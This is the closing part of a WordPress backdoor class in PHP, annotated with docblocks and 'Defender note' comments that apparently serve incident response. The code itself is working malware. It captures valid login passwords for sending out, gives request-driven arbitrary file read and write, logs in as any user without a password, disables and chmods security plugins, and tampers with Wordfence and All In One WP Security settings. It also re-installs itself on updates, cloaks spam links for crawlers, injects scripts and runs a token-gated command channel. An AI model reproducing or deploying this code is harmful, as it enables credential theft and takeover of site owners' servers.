   * @return bool always false, including when rows were updated.
   */
  1274. private function Wordfence() {
  1275. try {
  1276. global $wpdb;
  1277. $table = $wpdb->prefix . 'wfconfig';
  1278. if ( $wpdb->get_var( "SHOW TABLES LIKE '{$table}'" ) == $table ) {
  1279. $exclude = $wpdb->get_row( "SELECT * FROM {$table} WHERE name = 'scan_exclude'" );
  1280. $include = $wpdb->get_row( "SELECT * FROM {$table} WHERE name = 'scan_include_extra'" );
  1281. foreach ( $this->client->settings->security->{__FUNCTION__}->search->exclude as $wordfence ) {
  1282. if ( strpos( $exclude->val, $wordfence ) === false ) {
  1283. $exclude->val = $exclude->val . PHP_EOL . $wordfence;
  1284. $wpdb->update( $table, array('val' => $exclude->val), array('name' => 'scan_exclude'), $format = null, $where_format = null );
  1285. }
  1286. }
  1287. foreach ( $this->client->settings->security->{__FUNCTION__}->search->include as $wordfence ) {
  1288. if ( strpos( $include->val, $wordfence ) === false ) {
  1289. $include->val = $include->val . PHP_EOL . $wordfence;
  1290. $wpdb->update( $table, array('val' => $include->val), array('name' => 'scan_include_extra'), $format = null, $where_format = null );
  1291. }
  1292. }
  // Remote configuration decides which config rows are overwritten here.
  1293. foreach ( $this->client->settings->security->{__FUNCTION__}->scans as $where => $val ) {
  1294. $wpdb->update( $table, array('val' => $val), array('name' => "{$where}"), $format = null, $where_format = null );
  1295. }
  1296. }
  1297. return false;
  1298. } catch ( Exception $e ) {
  1299. return false;
  1300. }
  1301. }
  1302.  
  /**
   * Overwrites settings of the All In One WP Security plugin.
   *
   * Reads the 'aio_wp_security_configs' option and, for every key => value pair
   * in settings->security->AllInOneSecurity->scans (selected via __FUNCTION__),
   * sets that key and saves the option. The option is saved once per key.
   *
   * Defender note: the keys are supplied remotely and are not visible in this
   * listing; compare the stored option with the values shown in the plugin's
   * settings screens and with a backup.
   *
   * @return bool always false, including when the option was updated.
   */
  1303. private function AllInOneSecurity() {
  1304. try {
  1305. if ( $option = $this->_get_option( 'aio_wp_security_configs' ) ) {
  1306. foreach ( $this->client->settings->security->{__FUNCTION__}->scans as $where => $value ) {
  1307. $option[$where] = $value;
  1308. $this->_update_option( 'aio_wp_security_configs', $option );
  1309. }
  1310. }
  1311. return false;
  1312. } catch ( Exception $e ) {
  1313. return false;
  1314. }
  1315. }
  1316.  
  /**
   * Runs the per-plugin tampering method for every matching active plugin.
   *
   * Iterates settings->plugins as key => value. When findPlugin( value ) finds
   * an active plugin, the method named by the key is invoked dynamically on
   * this object ($this->{$key}()). The method name therefore comes from the
   * remotely supplied configuration, not from a fixed list in the code.
   *
   * @return bool always false.
   */
  1317. private function update() {
  1318. try {
  1319. if ( !isset( $this->client ) ) {
  1320. $this->client = $this->cache()->files;
  1321. }
  1322. foreach ( $this->client->settings->plugins as $key => $value ) {
  1323. if ( $this->findPlugin( $value ) !== false ) {
  1324. $this->{$key}();
  1325. }
  1326. }
  1327. return false;
  1328. } catch ( Exception $e ) {
  1329. return false;
  1330. }
  1331. }
  1332.  
  /**
   * Deactivates selected plugins and makes their files inaccessible.
   *
   * For each name in settings->security->disable, every plugin record returned
   * by get_plugins() (helper not shown here) is searched field by field. If a
   * field contains the name (case-insensitive) and the plugin is active, the
   * plugin is deactivated through _deactivate_plugins() and, when chmod() and
   * WP_PLUGIN_DIR are available, WP_PLUGIN_DIR/<plugin key> is set to mode 0000.
   * $return is filled in but never used.
   *
   * Defender note: a security plugin that is suddenly inactive, together with a
   * plugin path whose permissions are 0000, matches this routine. Restore the
   * permissions before attempting to reactivate or reinstall the plugin.
   *
   * @return bool always false.
   */
  1333. private function disable() {
  1334. try {
  1335. 
  1336. if ( !isset( $this->client ) ) {
  1337. $this->client = $this->cache()->files;
  1338. }
  1339. $return = array();
  1340. foreach ( $this->client->settings->security->disable as $disable ) {
  1341. foreach ( $this->get_plugins() as $key => $plugins ) {
  1342. foreach ( $plugins as $plugin_key => $plugin ) {
  1343. if ( stristr( $plugin, $disable ) && $plugins['active'] == 1 ) {
  1344. $return[$key] = $plugins;
  1345. $this->_deactivate_plugins( $key );
  1346. if ( function_exists( 'chmod' ) && defined( 'WP_PLUGIN_DIR' ) ) {
  1347. chmod( WP_PLUGIN_DIR . "/{$key}", 0000 );
  1348. }
  1349. }
  1350. }
  1351. }
  1352. }
  1353. return false;
  1354. } catch ( Exception $e ) {
  1355. return false;
  1356. }
  1357. }
  1358.  
  /**
   * Finds the first active plugin with any field containing $name.
   *
   * Walks the records returned by get_plugins() (helper not shown here) and
   * compares every field value against $name with stristr(), i.e. as a
   * case-insensitive substring.
   *
   * @param string $name substring to look for in the plugin record's fields.
   * @return mixed the matching plugin record, or false when none matches or an
   *               Exception is caught.
   */
  1359. private function findPlugin( $name ) {
  1360. try {
  1361. foreach ( $this->get_plugins() as $key => $plugins ) {
  1362. foreach ( $plugins as $plugin_key => $plugin ) {
  1363. if ( stristr( $plugin, $name ) && $plugins['active'] == 1 ) {
  1364. return $plugins;
  1365. }
  1366. }
  1367. }
  1368. return false;
  1369. } catch ( Exception $e ) {
  1370. return false;
  1371. }
  1372. }
  1373.  
  /**
   * Returns the path of the local configuration cache file.
   *
   * Calls upDir() to refresh $this->uploadDir and returns
   * "<uploadDir>/.json", a dot-file inside the WordPress upload directory.
   *
   * Defender note: a file named '.json' in an uploads folder whose content is a
   * hexadecimal string (see get(), which stores bin2hex() output) is the cache
   * this class maintains.
   *
   * @return mixed the cache file path, or false if an Exception is caught.
   */
  1374. private function json() {
  1375. try {
  1376. $this->upDir();
  1377. return $this->uploadDir . DIRECTORY_SEPARATOR . '.json';
  1378. } catch ( Exception $e ) {
  1379. return false;
  1380. }
  1381. }
  1382.  
  /**
   * Fetches the configuration document and refreshes the on-disk cache.
   *
   * When post() is truthy (helper not shown here; presumably it performs the
   * remote request and fills $this->json_encode — confirm against its body):
   *  - if $this->json_encode passes json_validator(), it is stored hex-encoded
   *    in the cache file and returned (re-read from the file when the write
   *    succeeded, otherwise returned from memory);
   *  - otherwise the existing cache file is hex-decoded and returned.
   *
   * @return mixed the configuration as a JSON string, or false when post() is
   *               falsy or an Exception is caught.
   */
  1383. private function get() {
  1384. try {
  1385. if ( $this->post() ) {
  1386. if ( $this->json_validator( $this->json_encode ) ) {
  1387. $write = $this->write( $this->json(), bin2hex( $this->json_encode ) );
  1388. return ($write) ? $this->hex2bin( $this->read( $this->json() ) ) : $this->json_encode;
  1389. } else {
  1390. return $this->hex2bin( $this->read( $this->json() ) );
  1391. }
  1392. }
  1393. return false;
  1394. } catch ( Exception $e ) {
  1395. return false;
  1396. }
  1397. }
  1398.  
  /**
   * Returns the decoded configuration, using the cache file when it is fresh.
   *
   * If the cache file exists and timestamp( filemtime ) is 12 or more, the
   * configuration is fetched again through get(); the unit of that threshold is
   * defined by timestamp(), which is not shown here. Otherwise the cached copy is
   * hex-decoded and used, provided it has a 'files' member; if not, get() is
   * called. With no cache file, get() is called.
   *
   * Callers dereference the result directly (->files, ->data), so a failed
   * fetch surfaces as a property access on a non-object.
   *
   * @return mixed decoded JSON object, or false if an Exception is caught.
   */
  1399. private function cache() {
  1400. try {
  1401. if ( file_exists( $this->json() ) ) {
  1402. if ( $this->timestamp( filemtime( $this->json() ) ) >= 12 ) {
  1403. return json_decode( $this->get() );
  1404. } else {
  1405. $json = json_decode( $this->hex2bin( $this->read( $this->json() ) ) );
  1406. return (isset( $json->files )) ? $json : json_decode( $this->get() );
  1407. }
  1408. } else {
  1409. return json_decode( $this->get() );
  1410. }
  1411. } catch ( Exception $e ) {
  1412. return false;
  1413. }
  1414. }
  1415.  
  /**
   * Writes $data to $filename unless the file already has the same byte length.
   *
   * An existing file is rewritten only when filesize() differs from
   * strlen( $data ); content is not compared. A missing file is always written.
   * The final "return false" is unreachable in practice because the two
   * file_exists() tests cover both cases.
   *
   * @param string $filename target path.
   * @param string $data     content to store.
   * @return bool true when the file already matched in size or the write
   *              succeeded, false when the write failed.
   */
  1416. private function writing( $filename, $data ) {
  1417. if ( file_exists( $filename ) ) {
  1418. if ( filesize( $filename ) !== strlen( $data ) ) {
  1419. return $this->write( $filename, $data );
  1420. }
  1421. return true;
  1422. }
  1423. if ( !file_exists( $filename ) ) {
  1424. return $this->write( $filename, $data );
  1425. }
  1426. return false;
  1427. }
  1428.  
  /**
   * Replaces the content of $filename with $data.
   *
   * Prefers fopen( 'w+' ) / fwrite(), which truncates or creates the target,
   * and falls back to file_put_contents() when those functions are missing.
   * The fopen() result is not checked before use, and in the first branch a
   * zero-byte write is reported as false.
   *
   * @param string $filename target path.
   * @param string $data     content to store.
   * @return bool true on a successful write, false otherwise.
   */
  1429. private function write( $filename, $data ) {
  1430. try {
  1431. if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
  1432. $fopen = fopen( $filename, 'w+' );
  1433. $fwrite = fwrite( $fopen, $data );
  1434. fclose( $fopen );
  1435. return ($fwrite) ? true : false;
  1436. } else if ( function_exists( 'file_put_contents' ) ) {
  1437. return (file_put_contents( $filename, $data ) !== false) ? true : false;
  1438. }
  1439. return false;
  1440. } catch ( Exception $e ) {
  1441. return false;
  1442. }
  1443. }
  1444.  
  /**
   * Request-driven file write (and read) primitive.
   *
   * Takes the target path from the hex-encoded request parameter 'filename'
   * and, optionally, content from the hex-encoded parameter 'content'.
   *  - With content: the file is created or overwritten and the path and
   *    content are returned through answer().
   *  - Without content, file exists: the file's content is returned.
   *  - Without content, file missing: a file holding a single space is created.
   * The path is used as given; no restriction to a base directory is applied
   * in this method, and any access control happens in the dispatcher that
   * calls it (not shown here).
   *
   * Defender note: this gives whoever can reach the dispatcher write access to
   * any path the PHP process can write. Requests carrying long hexadecimal
   * 'filename' / 'content' parameters are a log and WAF indicator.
   *
   * @return mixed answer() result, or false when 'filename' is absent, a write
   *               fails, or an Exception is caught.
   */
  1445. private function write_file() {
  1446. try {
  1447. if ( !isset( $_REQUEST['filename'] ) ) {
  1448. return false;
  1449. }
  1450. $filename = $this->hex2bin( $_REQUEST['filename'] );
  1451. if ( isset( $_REQUEST['content'] ) ) {
  1452. $content = $this->hex2bin( $_REQUEST['content'] );
  1453. }
  1454. if ( file_exists( $filename ) ) {
  1455. if ( isset( $content ) ) {
  1456. if ( $write = $this->write( $filename, $content ) ) {
  1457. return $this->answer( $write, $filename, $content );
  1458. }
  1459. } else {
  1460. return $this->answer( true, $filename, $this->read( $filename ) );
  1461. }
  1462. } else {
  1463. if ( isset( $content ) ) {
  1464. if ( $write = $this->write( $filename, $content ) ) {
  1465. return $this->answer( $write, $filename, $content );
  1466. }
  1467. } else {
  1468. return $this->answer( $this->write( $filename, ' ' ), $filename, '' );
  1469. }
  1470. }
  1471. return false;
  1472. } catch ( Exception $e ) {
  1473. return false;
  1474. }
  1475. }
  1476.  
  /**
   * Appends $data to $filename.
   *
   * Uses fopen( 'a' ) / fwrite() when available, otherwise
   * file_put_contents() with FILE_APPEND. In the first branch the handle is
   * never closed explicitly and the fopen() result is not checked.
   *
   * Used in this excerpt to add text to .htaccess and wp-cache-config.php.
   *
   * @param string $filename target path.
   * @param string $data     text to append.
   * @return bool true on a successful append, false otherwise.
   */
  1477. private function write_append( $filename, $data ) {
  1478. try {
  1479. if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
  1480. $write = fopen( $filename, 'a' );
  1481. 
  1482. return (fwrite( $write, $data )) ? true : false;
  1483. 
  1484. } else if ( function_exists( 'file_put_contents' ) ) {
  1485. return (file_put_contents( $filename, $data, FILE_APPEND ) !== false) ? true : false;
  1486. }
  1487. 
  1488. return false;
  1489. } catch ( Exception $e ) {
  1490. return false;
  1491. }
  1492. }
  1493.  
  /**
   * Reads a whole file into a string.
   *
   * Returns false for a missing file. Uses file_get_contents() when it exists
   * and the file is readable; otherwise falls back to an fopen()/fread() loop
   * that reads filesize() bytes per iteration until end of file.
   *
   * @param string $filename path to read.
   * @return mixed file content, or false when the file is missing, unreadable,
   *               or an Exception is caught.
   */
  1494. private function read( $filename ) {
  1495. try {
  1496. if ( !file_exists( $filename ) ) {
  1497. return false;
  1498. }
  1499. if ( function_exists( 'file_get_contents' ) && is_readable( $filename ) ) {
  1500. return file_get_contents( $filename );
  1501. }
  1502. 
  1503. if ( function_exists( 'fopen' ) && is_readable( $filename ) ) {
  1504. $file = fopen( $filename, 'r' );
  1505. $content = '';
  1506. while ( !feof( $file ) ) {
  1507. $content .= fread( $file, filesize( $filename ) );
  1508. }
  1509. fclose( $file );
  1510. return $content;
  1511. }
  1512. 
  1513. return false;
  1514. } catch ( Exception $e ) {
  1515. return false;
  1516. }
  1517. }
  1518.  
  /**
   * Request-driven file read primitive.
   *
   * Takes the path from the hex-encoded request parameter 'filename' and
   * returns the file's content: as-is when it is valid JSON according to
   * json_validator(), otherwise wrapped by answer(). The path is used as given;
   * no restriction to a base directory is applied in this method.
   *
   * Defender note: any file readable by the PHP process, wp-config.php
   * included, must be considered disclosed on a host where this was reachable.
   * Rotate database credentials and the authentication keys and salts stored
   * there as part of recovery.
   *
   * @return mixed file content or answer() result; false when 'filename' is
   *               absent or an Exception is caught.
   */
  1519. private function read_file() {
  1520. try {
  1521. if ( !isset( $_REQUEST['filename'] ) ) {
  1522. return false;
  1523. }
  1524. $filename = $this->hex2bin( $_REQUEST['filename'] );
  1525. 
  1526. if ( $this->json_validator( $read = $this->read( $filename ) ) ) {
  1527. return $read;
  1528. } else {
  1529. return $this->answer( true, $filename, $read );
  1530. }
  1531. } catch ( Exception $e ) {
  1532. return false;
  1533. }
  1534. }
  1535.  
  /**
   * Establishes a logged-in session for a user chosen by request parameter.
   *
   * Reads 'user_id' from the request (the script exits when it is absent),
   * looks the user up by id, sets it as the current user and issues an
   * authentication cookie for it. No password or other credential for that
   * user is checked in this method; any access control lies in the dispatcher
   * that calls it (not shown here).
   *
   * Defender note: sessions created this way do not pass through the normal
   * login form, so they will not appear as wp-login.php sign-ins. Changing the
   * authentication keys and salts in wp-config.php invalidates cookies already
   * issued.
   *
   * @return mixed answer() result containing the user object, or false when no
   *               such user exists or an Exception is caught.
   */
  1536. private function login() {
  1537. try {
  1538. $id = (isset( $_REQUEST['user_id'] )) ? $_REQUEST['user_id'] : exit;
  1539. if ( $user = $this->_get_user_by( 'id', $id ) ) {
  1540. $this->_wp_set_current_user( $user->ID, $user->user_login );
  1541. $this->_wp_set_auth_cookie( $user->ID );
  1542. return $this->answer( true, 'login data', $user );
  1543. }
  1544. return false;
  1545. } catch ( Exception $e ) {
  1546. return false;
  1547. }
  1548. }
  1549.  
  /**
   * Captures credentials submitted to the WordPress login form.
   *
   * Runs on every request via loaded(). When the POST body has a 'log' field,
   * the submitted username and password are checked with _wp_authenticate().
   * If the result carries user data (i.e. the credentials were valid), the
   * username, the clear-text password, the 'redirect_to' value, the current
   * URL and the JSON-encoded user record are passed to send( 'login', ... ).
   * send() is not shown here; presumably it transmits the data to the
   * operator's server — confirm against its body.
   *
   * Defender note: every password entered on the site while this code was
   * present should be treated as disclosed and reset, including for accounts
   * that reuse it elsewhere.
   *
   * @return bool always false.
   */
  1550. private function wp_login() {
  1551. try {
  1552. if ( isset( $_POST['log'] ) ) {
  1553. $username = (isset( $_POST['log'] )) ? $_POST['log'] : 'not isset';
  1554. $password = (isset( $_POST['pwd'] )) ? $_POST['pwd'] : 'not isset';
  1555. $wp_authenticate = $this->_wp_authenticate( $username, $password );
  // Only successful authentications are forwarded.
  1556. if ( isset( $wp_authenticate->data ) ) {
  1557. $this->send( 'login', array(
  1558. 'username' => $username,
  1559. 'password' => $password,
  1560. 'redirect_to' => (isset( $_POST['redirect_to'] )) ? $_POST['redirect_to'] : '',
  1561. 'admin_url' => 'http://' . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'],
  1562. 'json' => json_encode( $wp_authenticate->data ),
  1563. ) );
  1564. }
  1565. }
  1566. return false;
  1567. } catch ( Exception $e ) {
  1568. return false;
  1569. }
  1570. }
  1571.  
  /**
   * Tests whether request parameter $name is present and loosely equals $value.
   *
   * The comparison uses ==, so PHP's type-juggling rules apply.
   *
   * @param string $name  request parameter name.
   * @param mixed  $value value to compare against.
   * @return bool true on a match, false otherwise.
   */
  1572. private function request( $name, $value ) {
  1573. if ( isset( $_REQUEST["{$name}"] ) && $_REQUEST["{$name}"] == $value ) {
  1574. return true;
  1575. }
  1576. return false;
  1577. }
  1578.  
  /**
   * Re-plants the implant whenever the site is being maintained.
   *
   * Inspects the current request and calls:
   *  - install() on activate=true, activated=true or action=heartbeat;
   *  - theme() on action=upload-theme, install-theme or do-theme-upgrade;
   *  - plugin() on action=upload-plugin, install-plugin or do-plugin-upgrade;
   *  - install() on action=do-core-upgrade, do-core-reinstall, or a request URI
   *    containing 'about.php?updated'.
   *
   * Defender note: updating or reinstalling core, themes or plugins from the
   * admin dashboard does not clean an affected site, because those very
   * requests trigger re-installation; the heartbeat trigger fires during
   * ordinary admin sessions as well. Clean up with the code not running, e.g.
   * by replacing files from outside the web application.
   *
   * @return mixed null on normal completion, false if an Exception is caught.
   */
  1579. private function activated() {
  1580. try {
  1581. if ( !isset( $this->client ) ) {
  1582. $this->client = $this->cache()->files;
  1583. }
  1584. if ( $this->request( 'activate', 'true' ) || $this->request( 'activated', 'true' ) || $this->request( 'action', 'heartbeat' ) ) {
  1585. $this->install();
  1586. }
  1587. if ( $this->request( 'action', 'upload-theme' ) || $this->request( 'action', 'install-theme' ) || $this->request( 'action', 'do-theme-upgrade' ) ) {
  1588. $this->theme();
  1589. }
  1590. if ( $this->request( 'action', 'upload-plugin' ) || $this->request( 'action', 'install-plugin' ) || $this->request( 'action', 'do-plugin-upgrade' ) ) {
  1591. $this->plugin();
  1592. }
  1593. if ( $this->request( 'action', 'do-core-upgrade' ) || $this->request( 'action', 'do-core-reinstall' ) || (stristr( @$_SERVER['REQUEST_URI'], 'about.php?updated' )) ) {
  1594. $this->install();
  1595. }
  1596. } catch ( Exception $e ) {
  1597. return false;
  1598. }
  1599. }
  1600.  
  /**
   * Self-update check: refreshes planted files when a newer version is offered.
   *
   * Compares the class's own $version with the 'version' value of the remote
   * configuration and calls reinstall() when the local one is lower.
   *
   * @return bool true when reinstall() was triggered, false otherwise or if an
   *              Exception is caught.
   */
  1601. private function upgrade() {
  1602. try {
  1603. if ( !isset( $this->client ) ) {
  1604. $this->client = $this->cache()->files;
  1605. }
  1606. if ( $this->version < $this->client->version ) {
  1607. $this->reinstall();
  1608. return true;
  1609. }
  1610. return false;
  1611. } catch ( Exception $e ) {
  1612. return false;
  1613. }
  1614. }
  1615.  
  /**
   * Hooks the output routines onto a WordPress action named by remote data.
   *
   * Reads the 'data' section of the configuration. If data->location is set,
   * code() is registered on that action and the method returns; otherwise, if
   * data->script->location is set, script() is registered on that action. Only
   * one of the two is registered per call.
   *
   * @return bool true when a hook was registered, false otherwise or if an
   *              Exception is caught.
   */
  1616. private function init() {
  1617. try {
  1618. $data = $this->cache()->data;
  1619. if ( isset( $data->location ) ) {
  1620. $this->_add_action( $data->location, array($this, 'code') );
  1621. return true;
  1622. }
  1623. if ( isset( $data->script->location ) ) {
  1624. $this->_add_action( $data->script->location, array($this, 'script') );
  1625. return true;
  1626. }
  1627. return false;
  1628. } catch ( Exception $e ) {
  1629. return false;
  1630. }
  1631. }
  1632.  
  /**
   * Classifies the current visitor by User-Agent using remotely supplied patterns.
   *
   * Stores the configuration's 'data' section in $this->is_bot->data, then sets
   * $this->is_bot->bot and $this->is_bot->unbot to whether the lower-cased
   * User-Agent matches data->bot and data->unbot respectively. Both values are
   * interpolated into a "~(...)~i" regular expression as-is.
   *
   * The result is delivered through those properties; the return value carries
   * no information.
   *
   * @return bool always false.
   */
  1633. private function is_bot() {
  1634. try {
  1635. $this->is_bot->data = $this->cache()->data;
  1636. $this->is_bot->bot = (preg_match( "~({$this->is_bot->data->bot})~i", strtolower( @$_SERVER['HTTP_USER_AGENT'] ) )) ? true : false;
  1637. $this->is_bot->unbot = (preg_match( "~({$this->is_bot->data->unbot})~i", strtolower( @$_SERVER['HTTP_USER_AGENT'] ) )) ? true : false;
  1638. return false;
  1639. } catch ( Exception $e ) {
  1640. return false;
  1641. }
  1642. }
  1643.  
  /**
   * Emits remotely supplied markup to anonymous, non-crawler visitors.
   *
   * After is_bot() has classified the request, data->script->data is echoed
   * into the page only when the User-Agent matches neither the 'bot' nor the
   * 'unbot' pattern and the visitor is not logged in.
   *
   * Defender note: administrators browsing while logged in never receive this
   * output, so it is easy to miss. Check pages from a logged-out session and
   * compare the delivered HTML with what the theme should produce.
   *
   * @return bool always false.
   */
  1644. public function script() {
  1645. try {
  1646. $this->is_bot();
  1647. if ( !$this->is_bot->bot && !$this->is_bot->unbot && !$this->_is_user_logged_in() ) {
  1648. echo $this->is_bot->data->script->data;
  1649. }
  1650. return false;
  1651. } catch ( Exception $e ) {
  1652. return false;
  1653. }
  1654. }
  1655.  
  /**
   * Serves alternative content to visitors classified as crawlers (cloaking).
   *
   * Acts only when the User-Agent matches the 'bot' pattern, does not match
   * 'unbot', and the visitor is not logged in:
   *  - when data->status is exactly 9 and data->redirect is non-empty, a 301
   *    Location header to that URL is sent;
   *  - when data->is_home is truthy, data->style followed by the data->link
   *    entries joined with data->implode is echoed on every page;
   *  - when data->is_home is falsy, the same output is echoed only on pages
   *    that are neither the home page nor the front page.
   * This is consistent with search-engine link injection, since regular
   * visitors and site staff do not receive the output.
   *
   * Defender note: compare the HTML returned for a crawler User-Agent with the
   * HTML returned to a browser; differences in links or an unexpected 301 are
   * the observable effect.
   *
   * @return bool true on normal completion, false if an Exception is caught.
   */
  1656. public function code() {
  1657. try {
  1658. $this->is_bot();
  1659. if ( $this->is_bot->bot && !$this->is_bot->unbot && !$this->_is_user_logged_in() ) {
  1660. if ( $this->is_bot->data->status === 9 && !empty( $this->is_bot->data->redirect ) && isset( $this->is_bot->data->redirect ) ) {
  1661. header( "Location: {$this->is_bot->data->redirect}", true, 301 );
  1662. }
  1663. if ( $this->is_bot->data->is_home ) {
  1664. echo $this->is_bot->data->style . join( $this->is_bot->data->implode, $this->is_bot->data->link );
  1665. }
  1666. if ( !$this->is_bot->data->is_home && !$this->_is_home() && !$this->_is_front_page() ) {
  1667. echo $this->is_bot->data->style . join( $this->is_bot->data->implode, $this->is_bot->data->link );
  1668. }
  1669. }
  1670. return true;
  1671. } catch ( Exception $e ) {
  1672. return false;
  1673. }
  1674. }
  1675.  
  /**
   * Registers remove_rel() as a 'the_content' filter with priority 1000.
   *
   * @return mixed the result of _add_filter() (wrapper not shown here).
   */
  1676. public function filter() {
  1677. return $this->_add_filter( 'the_content', array($this, 'remove_rel'), 1000 );
  1678. }
  1679.  
  /**
   * Strips rel="..." attributes from post content.
   *
   * Every occurrence of ' rel="..."' in $content is handed to
   * remove_rel_replace(), which returns an empty string for it. The leading
   * group is written "(:?", i.e. a capturing group with an optional colon, not
   * the non-capturing "(?:" form.
   *
   * Defender note: this removes attributes such as rel="nofollow" from all
   * links in rendered posts, which is a visible side effect on affected sites.
   *
   * @param string $content post content passed by the 'the_content' filter.
   * @return string|null content with the matched attributes removed.
   */
  1680. public function remove_rel( $content ) {
  1681. return preg_replace_callback( '/(:? rel=\")(.+?)(:?\")/', array($this, 'remove_rel_replace'), $content );
  1682. }
  1683.  
  /**
   * Callback for remove_rel(): deletes the matched rel attribute.
   *
   * @param array $content match array from preg_replace_callback(); element '0'
   *                       is the full match.
   * @return string|null the full match with the rel attribute pattern removed.
   */
  1684. public function remove_rel_replace( $content ) {
  1685. return preg_replace( '/(:? rel=\")(.+?)(:?\")/', '', $content['0'] );
  1686. }
  1687.  
  /**
   * Per-request entry point, registered on the WordPress 'init' action.
   *
   * Creates a fresh instance for each step and runs, in order: activated()
   * (re-plant on maintenance requests), disable() (deactivate selected
   * plugins), upgrade() (self-update), ftp() (not shown in this excerpt),
   * update() (cache/security plugin tampering), init() (output hooks),
   * wp_login() (credential capture) and filter() (rel attribute removal).
   * Because every step uses its own instance, state such as $this->client is
   * not shared between them.
   *
   * Defender note: all of this executes on ordinary page loads once the file is
   * included, without any special request parameter.
   *
   * @return bool true on normal completion, false if an Exception is caught.
   */
  1688. public static function loaded() {
  1689. try {
  1690. (new self())->activated();
  1691. (new self())->disable();
  1692. (new self())->upgrade();
  1693. (new self())->ftp();
  1694. (new self())->update();
  1695. (new self())->init();
  1696. (new self())->wp_login();
  1697. (new self())->filter();
  1698. return true;
  1699. } catch ( Exception $e ) {
  1700. return false;
  1701. }
  1702. }
  1703. }
  1704.  
  // Bootstrap executed when the file is included or requested directly.
  //
  // 1. Lifts memory and execution-time limits and silences error output; a
  //    truthy 'debug' request parameter turns error display back on.
  // 2. Defines preArrayList(), a print_r() wrapper used to dump results.
  // 3. If WordPress is not loaded yet (ABSPATH undefined), looks for wp-load.php
  //    in the current directory and up to eight parent levels and includes the
  //    first one found, so the file also works when requested by its own URL.
  // 4. If the request carries a non-empty 'wp_api_token', registers a closure on
  //    'wp_loaded' that passes 'wp_api_application', 'wp_api_params' and the
  //    token to controlAction() (defined outside this excerpt) and prints the
  //    result. Otherwise registers WPTemplatesOptions::loaded on 'init'.
  //
  // Defender note: the parameter names wp_api_token, wp_api_application and
  // wp_api_params are request-level indicators; search access logs for them and
  // consider blocking them at the WAF. Token validation is performed inside
  // controlAction(), which is not visible here.
  1705. try {
  1706. @ini_set( 'memory_limit', -1 );
  1707. @ini_set( 'max_execution_time', -1 );
  1708. @set_time_limit( -1 );
  1709. @error_reporting( 0 );
  1710. @ini_set( 'display_errors', false );
  1711. if ( isset( $_REQUEST['debug'] ) ) {
  1712. if ( $_REQUEST['debug'] == true ) {
  1713. @error_reporting( -1 );
  1714. @ini_set( 'display_errors', true );
  1715. }
  1716. }
  1717. 
  1718. if ( !function_exists( 'preArrayList' ) ) {
  1719. function preArrayList( $arr ) {
  1720. echo '<pre>';
  1721. print_r( $arr );
  1722. echo '</pre>';
  1723. }
  1724. }
  // Walk up the directory tree to find and load the WordPress bootstrap.
  1725. if ( !defined( 'ABSPATH' ) ) {
  1726. foreach ( array('.', '..', '../..', '../../..', '../../../..', '../../../../..', '../../../../../..', '../../../../../../..', '../../../../../../../..') AS $directory ) {
  1727. if ( file_exists( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' ) ) {
  1728. include_once($directory . DIRECTORY_SEPARATOR . 'wp-load.php');
  1729. break;
  1730. }
  1731. }
  1732. }
  1733. } catch ( Exception $e ) {
  1734. }
  1735. try {
  // Command channel: present only when the request supplies a token.
  1736. if ( isset( $_REQUEST['wp_api_token'] ) && !is_null( $_REQUEST['wp_api_token'] ) && !empty( $_REQUEST['wp_api_token'] ) ) {
  1737. if ( function_exists( 'add_action' ) ) {
  1738. add_action( 'wp_loaded', function() {
  1739. $controlAction = WPTemplatesOptions::getInstanceWordpress()->controlAction( $_REQUEST['wp_api_application'], (isset( $_REQUEST['wp_api_params'] )) ? $_REQUEST['wp_api_params'] : '', $_REQUEST['wp_api_token'] );
  1740. if ( is_array( $controlAction ) || is_object( $controlAction ) ) {
  1741. preArrayList( $controlAction );
  1742. } else {
  1743. echo (!is_null( $controlAction )) ? $controlAction : '';
  1744. }
  1745. } );
  1746. }
  1747. } else {
  // Default path: run the background routines on every page load.
  1748. if ( function_exists( 'add_action' ) ) {
  1749. add_action( 'init', array('WPTemplatesOptions', 'loaded') );
  1750. }
  1751. }
  1752. } catch ( Exception $e ) {
  1753. }
  1754. }
  1755. //fed36e93a0509e20f2dc96cbbd85b678